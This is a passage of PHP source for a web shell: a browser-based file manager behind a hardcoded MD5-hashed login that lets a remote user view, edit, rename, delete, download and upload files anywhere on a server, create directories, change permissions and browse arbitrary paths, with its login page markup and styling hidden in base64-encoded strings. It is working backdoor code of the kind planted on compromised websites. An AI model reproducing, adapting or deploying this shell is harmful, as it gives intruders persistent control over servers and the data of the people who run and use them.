<td><a href=".$self."?edit=".realpath('.')."/".$file."><span class=li>View</span></a> | <a href=".$self."?rename=".realpath('.')."/".$file."><span class=li>Rename</span></a>|<a href=".$self."?delete=".realpath('.')."/".$file."><span class=li>Delete</span></a> | <a href=".$self."?download=".realpath('.')."/".$file."><span class=li>Download</span></a> ";
$bg++;
}
?>
</table>
</td>
</tr>
<tr height=30><td bgcolor="#000000" ><form action=# method=post enctype=multipart/form-data><table><tr><td><span class=hd>Upload file 1 : </td><td><input type=file name=a size=80 class=upl></span></td></tr>
<tr><td><span class=hd >Upload file 2 : </td><td><input type=file name=b size=80 class=upl></span></td></tr>
<tr><td><span class=hd>Upload file 3 : </td><td><input type=file name=c size=80 class=upl></span>
<tr><td>
<input type=submit value=Upload name=u class=sub></td></tr></form>
<br>
<form action=# method=post>
<tr><td>
<span class=hd>Create Directory</span></td><td><input type=text name=cdir size=50><input type=submit value=create>
</td></tr>
</form>
<?php
if(!empty($_POST['cdir']))
{
mkdir($_POST['cdir']);
header('location:'.$self.'?open='.$_SESSION['dir']);
}
?>
<form action=<?php echo $self;?> method=post>
<tr><td>
<span class=hd>Change Permission : </td><td><input type=text name=cper Value=<?php echo "'From Current Folder'"; ?> size=40>&nbsp
<select name=cc1>
<?php
for($k=1;$k<=7;$k++)
echo "<option>".$k;
?>
</select name=cc2>
<select>
<?php
for($k=1;$k<=7;$k++)
echo "<option>".$k;
?>
</select>
<select name=cc3>
<?php
for($k=1;$k<=7;$k++)
echo "<option>".$k;
?>
</select>
&nbsp;<input type=submit value=go name=dper></span>
</form>
</td></tr>
<tr><td>
<form action=# method=post>
<span class=hd>Go : </td><td><input type=text name=ndir Value=<?php echo realpath(''); ?> size=80>&nbsp;&nbsp;&nbsp;<input type=submit value=go name=dsub></span></td></tr>
</form>
</table>
</td>
</tr>
<?php
if(isset($_POST['dsub']))
header($self."?open=".$_POST['ndir']);
}
echo "<tr height=25><th bgcolor=#000000><span class=tab><font color=#336666>".base64_decode($pstr)."</span></th></tr>
</table>";
}
else if(isset($_GET['edit'])&&isset($_SESSION['a']))
{
if(isset($_POST['fn'])&& !empty($_POST['fc']))
{
if(empty($_SESSION['dir']))
{
$fo=fopen($_POST['fn'],"a");
}
else
{
$fo=fopen($_SESSION['dir']."/".$_POST['fn'],"a");
}
fwrite($fo,$_POST['fc']);
fclose($fo);
header('location:'.$self."?open=".$_SESSION['dir']);
}
else if(isset($_POST['fdata'])&&!empty($_POST['fdata']))
{
$b_dir=$_GET['edit'];
$exp=explode("/",$b_dir);
for($i=0;$i<sizeof($exp);$i++)
{
$txt=$exp[$i];
}
echo "File name is : ".$txt."<br>";
$fd=fopen($_GET['edit'],'w');
fwrite($fd,$_POST['fdata']);
fclose($fd);
header('location:'.$self."?open=".$_SESSION['dir']);
}
else
{
?>
<table width=100%><tr bgcolor=#000000><td>File Name:<?php echo $_GET['edit']; ?> [<a href=<?php echo $self; ?>>Main Page</a>]</font>
<form action=# method=post><tr bgcolor=#000000><td><center>
<center><textarea rows=30 cols=100 name=fdata>
<?php
$fedit=$_GET['edit'];
$frd=fopen($fedit,"r");
while(!feof($frd))
{
echo htmlspecialchars(fgets($frd));
echo "$fp";
}
?>
</textarea>
</center>
<hr class=li>
<input type=submit value="&nbsp;&nbsp;&nbsp;Edit File&nbsp;&nbsp;&nbsp;" name=fdat class=lin>
<hr class=li>
</form>
</td></tr>
</td></tr>
</table>
<?php
}
}
else
{
$cuser=md5($_POST['uname']);
$puser=md5($_POST['pass']);
echo base64_decode('PGNlbnRlcj48dGFibGUgaGVpZ2h0PTQwMCBib3JkZXI9MCAgYmFja2dyb3VuZD0iaHR0cDovL2kxMTc5LnBob3RvYnVja2V0LmNvbS9hbGJ1bXMveDM5MC9wYXVsbW9uY3kvdGVhbW51dHMvMS0yLmpwZz90PTEzMTAwOTMwNzUiICB3aWR0aD00MDAgQUxUPSJDUkVBVEVEIElOIElORElBIj4=');
?>
<tr><td height="141">
<p class="head">&nbsp;</p></td>
</tr>
<form action=# method=post>
<tr><td valign=top>Username</td><td><Input type=text name=uname>
</td></tr>
<tr><td>
Password </td><td><input type=password name=pass>
</td></tr>
<tr><td></td><td>
<input type=submit value=Login>
</td>
</form>
</tr>
<tr><td height=160></td>
</tr>
</table>
<?php
$user='27db7898211c8ccbeb4d5a97d198839a';
$pass='27db7898211c8ccbeb4d5a97d198839a';
if($cuser==$user && $puser==$pass)
{$_SESSION['a']=$_POST['uname'];
header('location:'.$self);}} ?>
<?php
echo base64_decode('IDxzdHlsZT4NCiNzdWJtaXQge2NvbG9yOiNmZjY2MDA7b3V0bGluZTpub25lOyB0ZXh0LWRlY29yYXRpb246bm9uZTsgDQpzaXplOjEwMHB4OyBib3JkZXI6ZG91YmxlOyBib3JkZXItY29sb3I6IzNDM0MzQzt9DQphIHtjb2xvcjojZmZmO291dGxpbmU6bm9uZTt0ZXh0LWRlY29yYXRpb246bm9uZTt9DQphOmhvdmVye3RleHQtZGVjb3JhdGlvbjpub25lO30NCmJvZHkNCnsNCglmb250LWZhbWlseTogVGltZXMgTmV3IFJvbWFuLCBUaW1lcywgc2VyaWY7DQoJZm9udC1zaXplOiA5cHg7DQp9DQouaGVhZCB7DQoJY29sb3I6ICNmZmZmZmY7DQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQoJZm9udC1mYW1pbHk6IENvdXJpZXIgTmV3LCBDb3VyaWVyLCBtb25vc3BhY2U7DQpmb250LXNpemU6IDEycHg7DQp9DQoudGFiDQp7DQoJYm9yZGVyLWNvbG9yOiMzMzY2NjY7DQoJYm9yZGVyOmRvdWJsZTsNCglmb250LWZhbWlseTogQ291cmllciBOZXcsIENvdXJpZXIsIG1vbm9zcGFjZTsNCmZvbnQtc2l6ZTogMTJweDsNCn0NCi5oZA0Kew0KCWNvbG9yOiMzM0NDQ0M7DQoJYm9yZGVyLWNvbG9yOiMyQTJBMkE7DQoJYm9yZGVyOmRvdWJsZTsNCglmb250LWZhbWlseTogQ291cmllciBOZXcsIENvdXJpZXIsIG1vbm9zcGFjZTsNCmZvbnQtc2l6ZTogMTJweDsNCn0NCi5saXsNCgljb2xvcjogIzMzQ0NDQzsNCgl0ZXh0LWRlY29yYXRpb246bm9uZTsNCglmb250LWZhbWlseTogQ291cmllciBOZXcsIENvdXJpZXIsIG1vbm9zcGFjZTsNCmZvbnQtc2l6ZTogMTJweDsNCgkNCn0NCi5saW4NCnsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMzNDQ0NDOw0KCXRleHQtZGVjb3JhdGlvbjpub25lOw0KCWZvbnQtZmFtaWx5OiBDb3VyaWVyIE5ldywgQ291cmllciwgbW9ub3NwYWNlOw0KZm9udC1zaXplOiAxMnB4Ow0KCQ0KfQ0KaW5wdXQNCnsNCmZvbnQtZmFtaWx5OiBDb3VyaWVyIE5ldywgQ291cmllciwgbW9ub3NwYWNlOw0KZm9udC1zaXplOiAxMnB4Ow0KY29sb3I6ICMwMDAwMDA7DQpib3JkZXI6ZG91YmxlOyANCmJvcmRlci1jb2xvcjojM0MzQzNDOw0KYmFja2dyb3VuZC1jb2xvcjojNjBENUM5Ow0KfQ0KdGV4dGFyZWENCnsNCmZvbnQtZmFtaWx5OiBDb3VyaWVyIE5ldywgQ291cmllciwgbW9ub3NwYWNlOw0KZm9udC1zaXplOiAxMnB4Ow0KY29sb3I6ICMwMDAwMDA7DQpib3JkZXI6ZG91YmxlOyANCmJvcmRlci1jb2xvcjojM0MzQzNDOw0KYmFja2dyb3VuZC1jb2xvcjojNjBENUM5Ow0KfQ0KaHINCnsNCmJhY2tncm91bmQtY29sb3I6ICMzM0NDQ0M7DQp9DQo8L3N0eWxlPg0KDQo=');
?>
Reference in a new issue Copy permalink